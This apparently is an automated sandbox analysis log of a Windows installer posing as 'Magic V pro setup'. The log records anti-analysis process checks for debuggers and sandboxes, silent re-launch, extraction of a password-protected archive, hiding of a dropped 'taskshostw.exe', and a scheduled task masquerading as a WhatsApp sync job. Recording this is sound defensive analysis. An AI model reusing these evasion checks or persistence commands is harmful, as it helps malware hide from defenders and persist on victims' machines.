Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="httpdebuggerui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="firejail.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="comodosandbox.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysanalyzer.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cuckoo.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="immunitydebugger.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="joeboxcontrol.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="appguarddesktop.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="petools.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="importrec.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="autorunsc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysinspector.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="netmon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sniff_hit.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cheatengine-x86_64.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="frida-helper-64.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="gdb.exe"

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe

File read: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process created: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$1042C,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process created: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe C:\Users\user\AppData\Local\programs\common\taskshostw.exe
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process created: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$1042C,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process created: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: dwmapi.dll	Jump to behavior
